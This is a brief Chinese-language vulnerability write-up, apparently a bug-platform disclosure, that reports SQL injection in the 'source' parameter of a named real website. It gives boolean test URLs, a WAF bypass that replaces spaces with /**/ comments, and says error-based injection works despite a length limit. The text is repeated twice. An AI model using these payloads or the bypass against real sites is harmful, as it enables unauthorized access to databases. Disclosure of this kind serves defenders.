漏洞细节
有waf,比较好绕 空格用/**/替换
http://cps.huatu.com/index.php/home/gourl/?source=htjysy' and/**/1=1--+
http://cps.huatu.com/index.php/home/gourl/?source=htjysy' and/**/1=2--+
根据返回判断存在注入
不过注入语句有长度限制
最后可用报错注入
有waf,比较好绕 空格用/**/替换
http://cps.huatu.com/index.php/home/gourl/?source=htjysy' and/**/1=1--+
http://cps.huatu.com/index.php/home/gourl/?source=htjysy' and/**/1=2--+
根据返回判断存在注入
不过注入语句有长度限制
最后可用报错注入